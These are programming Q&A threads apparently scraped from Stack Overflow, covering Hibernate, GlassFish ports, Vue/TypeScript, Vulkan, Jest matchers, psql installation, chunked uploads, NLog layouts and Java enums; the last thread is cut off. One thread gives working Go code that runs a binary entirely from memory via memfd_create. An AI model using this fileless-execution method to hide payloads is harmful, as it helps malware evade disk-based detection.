List<ConcatenaCep> findByCep(Integer cep);
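Another sketch, for completeness: when Hibernate is the JPA provider, the Session can be unwrapped from an injected EntityManager inside the method itself (standard JPA/Hibernate API; the surrounding service class and repository field are assumed):
@PersistenceContext
private EntityManager entityManager;

@Transactional(readOnly = true)
public List<ConcatenaCep> findByCepWithoutAutoFlush(Integer cep) {
    // org.hibernate.Session / org.hibernate.FlushMode
    entityManager.unwrap(Session.class).setFlushMode(FlushMode.COMMIT);
    return repository.findByCep(cep);
}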
| stackoverflow | {
"language": "en",
"length": 141,
"provenance": "stackexchange_0000F.jsonl.gz:900638",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653930"
} |
53909ef15674cd10718babcf0ca628f5e5877f99 | Stackoverflow Stackexchange
Q: How can I execute an executable from memory? Let's say I have included a binary in my program during compilation, so I keep it in a variable, something like
var myExec = []byte{'s','o','m','e',' ','b','y','t','e','s'}
So my question is whether there is a way to execute this binary within my program without writing it back to disk and calling exec or fork on it?
I am writing my app in Golang, so the method I am seeking should do it using Go or C (using cgo).
Basically, I am seeking something like piping a bash script into bash; I just don't know where I can pipe the bytes of a native executable to run it, and writing it back to disk and then letting the OS read it again seems like a lot of extra work.
A: In C and assuming Linux, you can change the protection of a memory region by means of the mprotect() system call, so that it can be executed (i.e.: turn a data region into a code region). After that, you could execute that region of memory by jumping into it.
| Q: How can I execute an executable from memory? Let's say I have included a binary in my program during compilation, so I keep it in a variable, something like
var myExec = []byte{'s','o','m','e',' ','b','y','t','e','s'}
So my question is whether there is a way to execute this binary within my program without writing it back to disk and calling exec or fork on it?
I am writing my app in Golang, so the method I am seeking should do it using Go or C (using cgo).
Basically, I am seeking something like piping a bash script into bash; I just don't know where I can pipe the bytes of a native executable to run it, and writing it back to disk and then letting the OS read it again seems like a lot of extra work.
A: In C and assuming Linux, you can change the protection of a memory region by means of the mprotect() system call, so that it can be executed (i.e.: turn a data region into a code region). After that, you could execute that region of memory by jumping into it.
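On Linux specifically, a hedged Go sketch of the no-disk route is memfd_create (kernel 3.17+), exposed via golang.org/x/sys/unix; this assumes myExec holds a complete, valid ELF binary:
package main

import (
    "fmt"
    "log"
    "os"
    "os/exec"

    "golang.org/x/sys/unix"
)

var myExec = []byte{ /* embedded ELF bytes */ }

func main() {
    // Create an anonymous in-memory file; nothing touches the disk.
    fd, err := unix.MemfdCreate("myexec", 0)
    if err != nil {
        log.Fatal(err)
    }
    if _, err := unix.Write(fd, myExec); err != nil {
        log.Fatal(err)
    }
    // Execute it through its /proc/self/fd path.
    cmd := exec.Command(fmt.Sprintf("/proc/self/fd/%d", fd))
    cmd.Stdout = os.Stdout
    if err := cmd.Run(); err != nil {
        log.Fatal(err)
    }
}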
| stackoverflow | {
"language": "en",
"length": 190,
"provenance": "stackexchange_0000F.jsonl.gz:900648",
"question_score": "9",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653960"
} |
f1a8bec93ff4e79084e2b93854b4a222136ad51e | Stackoverflow Stackexchange
Q: Glassfish There is a process already using the admin port 4848 asadmin start-domain domain1
But it shows this error.
There is a process already using the admin port 4848 -- it probably is another instance of a GlassFish server.
I have searched and found that it could be the hostname or that the port is used by an other application or server and actually it is used by TCP.
I have no problem with the hostname so I've tried this solution by changing port.
asadmin set server.http-service.http-listener.http-listener-1.port=10080
but it shows this error
remote failure: No configuration found for server.http-service.http-listener.http-listener-1
Command set failed.
I can't understand why.
A: Assuming you are running GlassFish under Linux:
1 - Check if glassfish is already runnig.
ps -ef |grep java
kill any process java relative to glassfish
2 - Check if the port 4848 is in use
netstat -nao |grep 4848
3 - Change the default port
Edit the file {glassfish_home}/config/asadminenv.conf
AS_ADMIN_PORT=4848
| Q: Glassfish There is a process already using the admin port 4848 asadmin start-domain domain1
But it shows this error.
There is a process already using the admin port 4848 -- it probably is another instance of a GlassFish server.
I have searched and found that it could be the hostname or that the port is used by an other application or server and actually it is used by TCP.
I have no problem with the hostname so I've tried this solution by changing port.
asadmin set server.http-service.http-listener.http-listener-1.port=10080
but it shows this error
remote failure: No configuration found for server.http-service.http-listener.http-listener-1
Command set failed.
I can't understand why.
A: Assuming you are running GlassFish under Linux:
1 - Check if glassfish is already runnig.
ps -ef |grep java
kill any Java process related to GlassFish
2 - Check if the port 4848 is in use
netstat -nao |grep 4848
3 - Change the default port
Edit the file {glassfish_home}/config/asadminenv.conf
AS_ADMIN_PORT=4848
A: I just kill all glassfish processes
pkill -f glassfish
A: I hit the same error.
This was useful - i.e. check you can ping $(hostname). Looks like glassfish checks hostname against IP, possibly during bind process.
My issue was my hostname/ip address in /etc/hosts was not aligned correctly, meaning I could not ping $(hostname). Once aligned and pinged, glassfish started ok.
A: I just hit this issue today. Be sure to delete the $PATH/TO/domain1/config/pid and $PATH/TO/domain1/config/pid.prev files as well, if the process isn't running but is being reported as still running.
| stackoverflow | {
"language": "en",
"length": 251,
"provenance": "stackexchange_0000F.jsonl.gz:900664",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654024"
} |
c5464a6c194d7e9b5920134f1a15959026e5d61d | Stackoverflow Stackexchange
Q: Typescript / Vuejs not compiling for computed property I'm starting to learn typescript & Vuejs.
Can anyone explain to me why I can't access the accounts property in data from the computed allChecked()?
import * as Vue from "vue";
declare var accounts: any[];
var app = new Vue({
el: '#vueowner',
data: {
accounts: accounts,
hasAccount: this.accounts.length > 0,
checkedAccounts: []
},
computed: {
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
}
})
I have this errors
ERROR in index.ts
(25,25): error TS2339: Property 'accounts' does not exist on type 'Vue'.
ERROR in index.ts
(25,50): error TS2339: Property 'checkedAccounts' does not exist on type 'Vue'.
A: In your allChecked method the this keyword isn't referencing the options object you are passing to the Vue constructor, but the instance of the Vue class itself.
You will need to create a class that extends Vue with the properties you wish to add to the original class :
import * as Vue from "vue";
class MyVue extends Vue {
accounts: any[];
checkedAccounts: any[];
}
const app = new MyVue({
// (...)
})
If you need more information about using Vue.js with Typescript check out this page: https://v2.vuejs.org/v2/guide/typescript.html
| Q: Typescript / Vuejs not compiling for computed property I'm starting to learn typescript & Vuejs.
Can anyone explain to me why I can't access the accounts property in data from the computed allChecked()?
import * as Vue from "vue";
declare var accounts: any[];
var app = new Vue({
el: '#vueowner',
data: {
accounts: accounts,
hasAccount: this.accounts.length > 0,
checkedAccounts: []
},
computed: {
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
}
})
I have this errors
ERROR in index.ts
(25,25): error TS2339: Property 'accounts' does not exist on type 'Vue'.
ERROR in index.ts
(25,50): error TS2339: Property 'checkedAccounts' does not exist on type 'Vue'.
A: In your allChecked method the this keyword isn't referencing the options object you are passing to the Vue constructor, but the instance of the Vue class itself.
You will need to create a class that extends Vue with the properties you wish to add to the original class :
import * as Vue from "vue";
class MyVue extends Vue {
accounts: any[];
checkedAccounts: any[];
}
const app = new MyVue({
// (...)
})
If you need more information about using Vue.js with Typescript check out this page: https://v2.vuejs.org/v2/guide/typescript.html
A: Looks like you need to annotate the return types because TypeScript has difficulties inferring the types of certain methods.
so instead of
allChecked() {
return this.accounts.length === this.checkedAccounts.length;
}
try this
allChecked(): boolean {
return this.accounts.length === this.checkedAccounts.length;
}
A: This is a good article to start with
VuejS with Typescript
https://johnpapa.net/vue-typescript/
<template>
</template>
<script lang="ts">
import {Component, Vue} from 'vue-property-decorator';
@Component
export default class App extends Vue {
public accounts: any = [];
public checkedAccounts: any = [];
public created(): void {
this.accounts = [];
this.checkedAccounts= [];
}
public allChecked(): boolean {
return this.accounts.length === this.checkedAccounts.length;
}
}
</script>
| stackoverflow | {
"language": "en",
"length": 292,
"provenance": "stackexchange_0000F.jsonl.gz:900665",
"question_score": "11",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654029"
} |
72b5a00c13c2f57fb301c977ac842b4486a07128 | Stackoverflow Stackexchange
Q: Can multiple subpass be used with single pipeline in vulkan VkGraphicsPipelineCreateInfo has an integer member, subpass.
My use case is creating a single pipeline object and using it with multiple subpasses. Each subpass has a different color attachment.
A: No. A pipeline is always built relative to a specific subpass of a specific render pass. It cannot be used in any other subpass:
The subpass index of the current render pass must be equal to the subpass member of the VkGraphicsPipelineCreateInfo structure specified when creating the VkPipeline currently bound to VK_PIPELINE_BIND_POINT_GRAPHICS.
You will need to create multiple pipelines, one for each subpass you intend to use it with. The pipeline cache should make this efficient for implementations that don't really care much about this.
| Q: Can multiple subpass be used with single pipeline in vulkan VkGraphicsPipelineCreateInfo has an integer member, subpass.
My use case is creating a single pipeline object and using it with multiple subpasses. Each subpass has a different color attachment.
A: No. A pipeline is always built relative to a specific subpass of a specific render pass. It cannot be used in any other subpass:
The subpass index of the current render pass must be equal to the subpass member of the VkGraphicsPipelineCreateInfo structure specified when creating the VkPipeline currently bound to VK_PIPELINE_BIND_POINT_GRAPHICS.
You will need to create multiple pipelines, one for each subpass you intend to use it with. The pipeline cache should make this efficient for implementations that don't really care much about this.
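As a minimal sketch (C), creating one pipeline per subpass while sharing a VkPipelineCache; everything except the subpass index is reused:
/* pipelineInfo is a fully filled VkGraphicsPipelineCreateInfo; only the
   subpass index changes between iterations. */
for (uint32_t i = 0; i < subpassCount; ++i) {
    pipelineInfo.subpass = i;
    vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineInfo,
                              NULL, &pipelines[i]);
}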
| stackoverflow | {
"language": "en",
"length": 123,
"provenance": "stackexchange_0000F.jsonl.gz:900667",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654037"
} |
a6297705bff230b8f33a7823e5bdc22e8cdc2d85 | Stackoverflow Stackexchange
Q: Get-Date formatting/culture How do I specify what part of my input string is the date and month?
If the input is 01/10/2017, this can be read as 1st Oct 2017 and 10th Jan 2017. Both are correct.
I want to be explicit that 01 is date and 10 is month, so that irrespective of locale and time format I can get a consistent result.
Sample code:
get-date -Date '01/10/2017'
The output is:
Tuesday, January 10, 2017 12:00:00 AM
The desired output is:
Sunday, October 01, 2017 12:00:00 AM
A: I have a solution for you. It requires the culture as one of the arguments.
([datetime]::ParseExact($date,"dd/MM/yyyy",[Globalization.CultureInfo]::CreateSpecificCulture('en-GB')))
A culture does not have to be specified. However, the argument for it does, otherwise you will get an error:
Cannot find an overload for "ParseExact" and the argument count: "2".
[cultureinfo]::InvariantCulture or $null can be used as the third argument:
$date = "01/10/2017"
[datetime]::ParseExact($date, "dd/MM/yyyy", [cultureinfo]::InvariantCulture)
[datetime]::ParseExact($date, "dd/MM/yyyy", $null)
Output in all three cases
01 October 2017 00:00:00
| Q: Get-Date formatting/culture How do I specify what part of my input string is the date and month?
If the input is 01/10/2017, this can be read as 1st Oct 2017 and 10th Jan 2017. Both are correct.
I want to be explicit that 01 is date and 10 is month, so that irrespective of locale and time format I can get a consistent result.
Sample code:
get-date -Date '01/10/2017'
The output is:
Tuesday, January 10, 2017 12:00:00 AM
The desired output is:
Sunday, October 01, 2017 12:00:00 AM
A: I have a solution for you. It requires the culture as one of the arguments.
([datetime]::ParseExact($date,"dd/MM/yyyy",[Globalization.CultureInfo]::CreateSpecificCulture('en-GB')))
A culture does not have to be specified. However, the argument for it does, otherwise you will get an error:
Cannot find an overload for "ParseExact" and the argument count: "2".
[cultureinfo]::InvariantCulture or $null can be used as the third argument:
$date = "01/10/2017"
[datetime]::ParseExact($date, "dd/MM/yyyy", [cultureinfo]::InvariantCulture)
[datetime]::ParseExact($date, "dd/MM/yyyy", $null)
Output in all three cases
01 October 2017 00:00:00
A: Try this:
Get-Date(Get-Date -Date $date -Format 'dd/MM/yyyy')
A: You can enforce the culture for single commands (or command blocks). This should help avoiding that date chaos.
PS C:\> [System.Threading.Thread]::CurrentThread.CurrentUICulture = "en-US" ; [System.Threading.Thread]::CurrentThread.CurrentCulture = "en-US"; get-date -Date '01/10/2017'
Tuesday, January 10, 2017 12:00:00 AM
PS C:\> [System.Threading.Thread]::CurrentThread.CurrentUICulture = "en-GB" ; [System.Threading.Thread]::CurrentThread.CurrentCulture = "en-GB"; get-date -Date '01/10/2017'
01 October 2017 00:00:00
| stackoverflow | {
"language": "en",
"length": 227,
"provenance": "stackexchange_0000F.jsonl.gz:900669",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654045"
} |
70257de2a550cf00c10df13ad2bf8b97cf850965 | Stackoverflow Stackexchange
Q: Logical OR for expected results in Jest This is best explained with an example:
expected(someNumber).toBe(1).or.toBe(-2).or.toBe(22) // expect result is 1 or -2 or 22
This is bad syntax, but can I do something like that in Jest?
A: As @JrGiant suggested, there could be a toBeOneOf; however, it is easy to implement your own matcher:
Example in TypeScript:
expect.extend({
toBeOneOf(received: any, items: Array<any>) {
const pass = items.includes(received);
const message = () =>
`expected ${received} to be contained in array [${items}]`;
if (pass) {
return {
message,
pass: true
};
}
return {
message,
pass: false
};
}
});
// Declare that jest contains toBeOneOf
// If you are not using TypeScript, remove this "declare global" altogether
declare global {
namespace jest {
interface Matchers<R> {
toBeOneOf(items: Array<any>): CustomMatcherResult;
}
}
}
describe("arrays", () => {
describe("getRandomItemFromArray", () => {
it("should return one of the expected - 1", () => {
expect(getRandomItemFromArray([1, 2])).toBeOneOf([1, 2])
});
});
});
| Q: Logical OR for expected results in Jest This is best explained with an example:
expected(someNumber).toBe(1).or.toBe(-2).or.toBe(22) // expect result is 1 or -2 or 22
This is bad syntax, but can I do something like that in Jest?
A: As @JrGiant suggested, there could be a toBeOneOf; however, it is easy to implement your own matcher:
Example in TypeScript:
expect.extend({
toBeOneOf(received: any, items: Array<any>) {
const pass = items.includes(received);
const message = () =>
`expected ${received} to be contained in array [${items}]`;
if (pass) {
return {
message,
pass: true
};
}
return {
message,
pass: false
};
}
});
// Declare that jest contains toBeOneOf
// If you are not using TypeScript, remove this "declare global" altogether
declare global {
namespace jest {
interface Matchers<R> {
toBeOneOf(items: Array<any>): CustomMatcherResult;
}
}
}
describe("arrays", () => {
describe("getRandomItemFromArray", () => {
it("should return one of the expected - 1", () => {
expect(getRandomItemFromArray([1, 2])).toBeOneOf([1, 2])
});
});
});
A: I recommend using the .toContain(item) matcher. The documentation can be found here.
The below code should work well:
expect([1, -2, 22]).toContain(someNumber);
A: I was also looking for a solution to the expect.oneOf issue. You may want to check out d4nyll's solution.
Here is an example of how it could work.
expect(myfunction()).toBeOneOf([1, -2, 22]);
A: A simple way around this is to use the standard .toContain() matcher (https://jestjs.io/docs/en/expect#tocontainitem) and reverse the expect statement:
expect([1, -2, 22]).toContain(someNumber);
A: If you really needed to do exactly that, I suppose you could put the logical comparisons inside the expect call, e.g.
expect(someNumber === 1 || someNumber === -2 || someNumber === 22).toBeTruthy();
If this is just for a "quick and dirty" check, this might suffice.
However, as suggested by several comments under your question, there seem to be several "code smells" that make both your initial problem as well as the above solution seem like an inappropriate way of conducting a test.
First, in terms of my proposed solution, that use of toBeTruthy is a corruption of the way Jasmine/Jest matchers are meant to be used. It's a bit like using expect(someNumber === 42).toBeTruthy(); instead of expect(someNumber).toBe(42). The structure of Jest/Jasmine tests is to provide the actual value in the expect call (i.e. expect(actualValue)) and the expected value in the matcher (e.g. toBe(expectedValue) or toBeTruthy() where expectedValue and true are the expected values respectively). In the case above, the actual value is (inappropriately) provided in the expect call, with the toBeTruthy matcher simply verifying this fact.
It might be that you need to separate your tests. For example, perhaps you have a function (e.g. called yourFunction) that you are testing that provides (at least) 3 different possible discrete outputs. I would presume that the value of the output depends on the value of the input. If that is the case, you should probably test all input/output combinations separately, e.g.
it('should return 1 for "input A" ', () => {
const someNumber = yourFunction("input A");
expect(someNumber).toBe(1);
});
it('should return -2 for "input B" ', () => {
const someNumber = yourFunction("input B");
expect(someNumber).toBe(-2);
});
it('should return 22 for "input C" ', () => {
const someNumber = yourFunction("input C");
expect(someNumber).toBe(22);
});
..or at least...
it('should return the appropriate values for the appropriate input ', () => {
let someNumber;
someNumber = yourFunction("input A");
expect(someNumber).toBe(1);
someNumber = yourFunction("input B");
expect(someNumber).toBe(-2);
someNumber = yourFunction("input C");
expect(someNumber).toBe(22);
});
One of the positive consequences of doing this is that, if your code changes in the future such that, e.g. one (but only one) of the conditions changes (in terms of either input or output), you only need to update one of three simpler tests instead of the single more complicated aggregate test. Additionally, with the tests separated this way, a failing test will more quickly tell you exactly where the problem is, e.g. with "input A", "input B", or "input C".
Alternatively, you may need to actually refactor yourFunction, i.e. the code-under-test itself. Do you really want to have a particular function in your code returning three separate discrete values depending on different input? Perhaps so, but I would examine the code separately to see if it needs to be re-written. It's hard to comment on this further without knowing more details about yourFunction.
A: To avoid putting all the logical comparisons in one statement and using toBeTruthy(), you can use nested try/catch statements:
try {
expect(someNumber).toBe(1)
}
catch{
try {
expect(someNumber).toBe(-2)
}
catch{
expect(someNumber).toBe(22)
}
}
To make it more convenient and more readable, you can put this into a helper function:
function expect_or(...tests) {
if (!tests || !Array.isArray(tests)) return;
try {
tests.shift()?.();
} catch (e) {
if (tests.length) expect_or(...tests);
else throw e;
}
}
NB: With Typescript replace line 1 with function expect_or(...tests: (() => void)[]) { to add types to the function parameter.
and use it like this:
expect_or(
() => expect(someNumber).toBe(1),
() => expect(someNumber).toBe(-2),
() => expect(someNumber).toBe(22)
);
| stackoverflow | {
"language": "en",
"length": 812,
"provenance": "stackexchange_0000F.jsonl.gz:900723",
"question_score": "67",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654210"
} |
bf5027f58ac8444c310800d4275775235129c247 | Stackoverflow Stackexchange
Q: Correct way to install psql without full Postgres on macOS? The official page does not mention such a case. But many users need only psql, without a local database (I have mine on AWS). Brew does not have psql.
A:
libpq 11.2
MacOS & zsh or bash
below works
*
*install libpq
brew install libpq
*update PATH
if use zsh:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
if use bash:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
| Q: Correct way to install psql without full Postgres on macOS? The official page does not mention such a case. But many users need only psql, without a local database (I have mine on AWS). Brew does not have psql.
A:
libpq 11.2
MacOS & zsh or bash
below works
*
*install libpq
brew install libpq
*update PATH
if use zsh:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc
if use bash:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.bash_profile
source ~/.bash_profile
A: You could also use homebrew to install libpq.
brew install libpq
This would give you psql, pg_dump and a whole bunch of other client utilities without installing Postgres.
Unfortunately since it provides some of the same utilities as are included in the full postgresql package, brew installs it "keg-only" which means it isn't in the PATH by default. Homebrew will spit out some information on how to add it to your PATH after installation. In my case it was this:
echo 'export PATH="/usr/local/opt/libpq/bin:$PATH"' >> ~/.zshrc
Alternatively, you can create symlinks for the utilities you need. E.g.:
ln -s /usr/local/Cellar/libpq/10.3/bin/psql /usr/local/bin/psql
Note: use your installed version instead of 10.3.
Alternatively, you could instruct homebrew to "link all of its binaries to the PATH anyway"
brew link --force libpq
but then you'd be unable to install the postgresql package later.
A: Homebrew only really has the postgres formula, and doesn't have any specific formula that only installs the psql tool.
So the "correct way" to get the psql application is indeed to install the postgres formula, and you'll see toward the bottom of the "caveats" section that it doesn't actually run the database, it just puts the files on your system:
$ brew install postgres
==> Downloading https://homebrew.bintray.com/bottles/postgresql-9.6.5.sierra.bottle.tar.gz
######################################################################## 100.0%
==> Pouring postgresql-9.6.5.sierra.bottle.tar.gz
==> /usr/local/Cellar/postgresql/9.6.5/bin/initdb /usr/local/var/postgres
==> Caveats
<snip>
To have launchd start postgresql now and restart at login:
brew services start postgresql
Or, if you don't want/need a background service you can just run:
pg_ctl -D /usr/local/var/postgres start
==> Summary
/usr/local/Cellar/postgresql/9.6.5: 3,269 files, 36.7MB
Now you can use psql to connect to remote Postgres servers, and won't be running a local one, although you could if you really wanted to.
To verify that the local postgres daemon isn't running, check your installed homebrew services:
$ brew services list
Name Status User Plist
mysql stopped
postgresql stopped
If you don't have Homebrew Services installed, just
$ brew tap homebrew/services
...and you'll get this functionality. For more information on Homebrew Services, read this excellent blog post that explains how it works.
A: I found all of these really unsatisfying, especially if you have to support multiple versions of postgres. A MUCH easier solution is to download the binaries here:
https://www.enterprisedb.com/download-postgresql-binaries
And simply run the executable version of psql that matches the database you're working against without any extra steps.
example:
./path/to/specific/version/bin/psql -c '\x' -c 'SELECT * FROM foo;'
A: If you truly don't need postgresql, then you don't even have to alter your PATH: just force-link libpq. The docs say the only reason it isn't linked by default is to avoid conflicts with the PostgreSQL package.
brew uninstall postgresql
brew install libpq
brew link --force libpq
A: Install libpq:
brew install libpq
Then, create a symlink:
sudo ln -s $(brew --prefix)/opt/libpq/bin/psql /usr/local/bin/psql
Hope it helps.
A: I found many useful answers here, but they are a bit outdated since Homebrew (on Apple silicon) moved the installation files to /opt/homebrew/Cellar/libpq/15.1. After libpq is installed with brew install libpq, you can run the command below to see the new location:
brew link --force libpq
Then you can add it to your zshrc with
echo 'export PATH="/opt/homebrew/Cellar/libpq/15.1/bin:$PATH"' >> ~/.zshrc
A: You could try brew install postgresql.
Alternatively, Postgres.app provides a nice GUI to manage your databases: https://postgresapp.com
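Whichever route you take, a quick sanity check is to confirm that the client resolves from your PATH and can reach a remote server. The hostname, user and database below are placeholders, not values from this thread:
psql --version
psql -h mydb.example.com -p 5432 -U myuser -d mydb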
| stackoverflow | {
"language": "en",
"length": 610,
"provenance": "stackexchange_0000F.jsonl.gz:900725",
"question_score": "334",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654216"
} |
04437bf2e06a214fd3e7d6791786de0097f423bb | Stackoverflow Stackexchange
Q: Best approach to assemble uploaded file chunks using spring-boot I am using spring-boot for my back end and plupload at front end to upload chunked files.
I have a post rest endpoint, which accepts a Multipart file in the form-data.
The scenario is: based on the chunk size, plupload will create n chunks and will call the post endpoint n times, each time with the next chunk.
Now I need to assemble these chunks at the server end. The endpoint might get requests from many clients simultaneously, so the problems are:
1) Need to identify all the requests from the same client.
2) Need to identify chunk0, chunk1, ..., chunkN of the same file.
3) Need to wait until all chunks get uploaded before reassembling.
My constraint is that I won't get much local storage space to store those chunks as temp files in a folder, maintain a hashmap for each file keyed by some unique identifier, and reassemble once the nth chunk arrives.
If someone has a solution to this problem, please provide an answer; some GitHub links would also help.
| Q: Best approach to assemble uploaded file chunks using spring-boot I am using spring-boot for my back end and plupload at front end to upload chunked files.
I have a post rest endpoint, which accepts a Multipart file in the form-data.
The scenario is: based on the chunk size, plupload will create n chunks and will call the post endpoint n times, each time with the next chunk.
Now I need to assemble these chunks at the server end. The endpoint might get requests from many clients simultaneously, so the problems are:
1) Need to identify all the requests from the same client.
2) Need to identify chunk0, chunk1, ..., chunkN of the same file.
3) Need to wait until all chunks get uploaded before reassembling.
My constraint is that I won't get much local storage space to store those chunks as temp files in a folder, maintain a hashmap for each file keyed by some unique identifier, and reassemble once the nth chunk arrives.
If someone has a solution to this problem, please provide an answer; some GitHub links would also help.
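No answer was recorded here, so the following is only a hedged sketch of one approach (not from the thread): plupload sends chunk and chunks form fields alongside each part, so the endpoint can append every part to a per-upload temp file and hand the file off when the last index arrives. The route and parameter names below are illustrative:
import java.io.RandomAccessFile;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.multipart.MultipartFile;

@RestController
public class ChunkUploadController {

    // Chunks are appended to one temp file per upload id.
    private final Path tmpDir = Paths.get(System.getProperty("java.io.tmpdir"), "uploads");

    @PostMapping("/load-data")
    public ResponseEntity<String> loadData(@RequestParam("file") MultipartFile file,
                                           @RequestParam("name") String uploadId, // unique per client + file
                                           @RequestParam("chunk") int chunk,
                                           @RequestParam("chunks") int chunks) throws Exception {
        Files.createDirectories(tmpDir);
        // plupload uploads a given file's chunks sequentially, so appending is safe.
        try (RandomAccessFile out = new RandomAccessFile(tmpDir.resolve(uploadId).toFile(), "rw")) {
            out.seek(out.length());
            out.write(file.getBytes());
        }
        if (chunk == chunks - 1) {
            // Last chunk: stream the assembled file to its destination (e.g. S3), then delete the temp file.
            return ResponseEntity.ok("assembled");
        }
        return ResponseEntity.ok("stored chunk " + chunk);
    }
}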
| stackoverflow | {
"language": "en",
"length": 181,
"provenance": "stackexchange_0000F.jsonl.gz:900727",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654220"
} |
02e3786680030560813c9456015fdf25a4ab9163 | Stackoverflow Stackexchange
Q: How to format NLog exception output to get a line separator? How do I get the output format below using NLog error logging: a line separator between each exception log entry, like this:
2017-06-19 16:53:20|SessionVal| Error message| Exception's Message | StackTrace
_______________________________________________________________________________________ 2017-06-19 16:52:10|SessionVal|Error occured while executing the procedure.
|Procedure xyz expects varchar(20) @ParameterName.|StackTrace....
Current NLog configuration;
<nlog autoReload="true" xmlns="http://www.nlog-project.org/schemas/NLog.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<targets>
<target name="logfile" xsi:type="File"
layout="${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log" />
</targets>
<rules>
<logger name="*" minlevel="Info" writeTo="logfile" />
</rules>
</nlog>
Update: @Amy, do you mean like this?
Update 2: Thank you @Amy it worked.
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
A: According to the asker of the question this is a solution:
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
| Q: How to format NLog exception output to get a line separator? How do I get the output format below using NLog error logging: a line separator between each exception log entry, like this:
2017-06-19 16:53:20|SessionVal| Error message| Exception's Message | StackTrace
_______________________________________________________________________________________ 2017-06-19 16:52:10|SessionVal|Error occured while executing the procedure.
|Procedure xyz expects varchar(20) @ParameterName.|StackTrace....
Current NLog configuration;
<nlog autoReload="true" xmlns="http://www.nlog-project.org/schemas/NLog.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<targets>
<target name="logfile" xsi:type="File"
layout="${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log" />
</targets>
<rules>
<logger name="*" minlevel="Info" writeTo="logfile" />
</rules>
</nlog>
Update: @Amy, do you mean like this?
Update 2: Thank you @Amy it worked.
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
A: According to the asker of the question this is a solution:
layout="--------------------------------------------------------------
${newline}${date:universalTime=false:format=yyyy-MM-dd HH\:mm\:ss}|
${aspnet-session:Variable=SessionKey} ${message} |
${exception:format=type,message,StackTrace}"
fileName="${basedir}/App_Data/Log/
${date:universalTime=false:format=yyyyMMdd}.log"
| stackoverflow | {
"language": "en",
"length": 128,
"provenance": "stackexchange_0000F.jsonl.gz:900738",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654276"
} |
15599f1b80bb60f7ddbb1d95cc48594e88defab9 | Stackoverflow Stackexchange
Q: Is it good practice to use ordinal of enum? I have an enum:
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
Is there any problem with using the ordinal() method to check "hierarchy" between enum members? I mean: are there any disadvantages to using it, apart from verbosity and the risk that somebody accidentally changes the order in the future?
Or is it better to do something like that:
public enum Persons {
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private Integer hierarchy;
private Persons(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
public Integer getHierarchy() {
return hierarchy;
}
}
A: If you only want to create relationships between enum values, you can actually use the trick of using other enum values:
public enum Person {
GRANDPARENT(null),
PARENT(GRANDPARENT),
CHILD(PARENT);
private final Person parent;
private Person(Person parent) {
this.parent = parent;
}
public final Person getParent() {
return parent;
}
}
Note that you can only use enum values that were declared lexically before the one you're trying to declare, so this only works if your relationships form an acyclic directed graph (and the order you declare them is a valid topological sort).
| Q: Is it good practice to use ordinal of enum? I have an enum:
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
Is there any problem with using the ordinal() method to check "hierarchy" between enum members? I mean: are there any disadvantages to using it, apart from verbosity and the risk that somebody accidentally changes the order in the future?
Or is it better to do something like that:
public enum Persons {
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private Integer hierarchy;
private Persons(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
